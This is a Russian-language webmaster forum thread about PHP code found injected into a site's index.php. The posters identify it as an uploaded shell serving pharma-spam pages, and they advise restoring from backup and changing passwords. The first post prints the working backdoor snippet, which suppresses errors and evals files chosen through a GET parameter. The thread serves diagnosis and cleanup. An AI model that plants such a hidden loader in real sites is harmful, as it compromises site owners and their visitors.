Alexej
Коллеги, доброго времени суток. Нужна помощь. Вот такой код разметился в самом начале index.php на сайте. Что это? Какие-нибудь подробности?
PHP:
<? error_reporting(0); ini_set(‘display_errors’, ‘Off’); if(isset($_GET[‘bo’])) { header(‘Content-Type: text/html; charset=utf-8’); $p=array_pop(@preg_split(«!/!»,$_GET[‘bo’])); echo eval/**/(‘?>’.join(«»,file(«css/main/bon/$p«)).‘<?’); die; }?>Вот в этом самом css/mail/bon навалилась гора php-файлов на фарм-тему.
Заранее спасибо.
mkramer
Что делает код — не так важно. Вам залили шел, важно понять как. Естественно, после восстановления сайта с бэкапа и смены всех возможных паролей.
Подозреваемые — скрипты, позволяющие пользователям закачивать файлы на сайт.
Drunkenmunky
Не обязательно.
В Total Commander, помнится, была уязвимость с доступом к хранимым паролям от FTP.
mkramer
@Drunkenmunky Согласен. Компрометация через уязвимости ПО — тоже вариант.
Taktreba
а мне кстатит интересно что делает код ) я ничего не понимаю
mkramer
@Taktreba По приведённому фрагменту относительно безобидно — подменяет контент сайта на свой, в определённых случаях.
— Добавлено —
Но я не видел файлы, которые он подключает. Может там всё и не так радужно.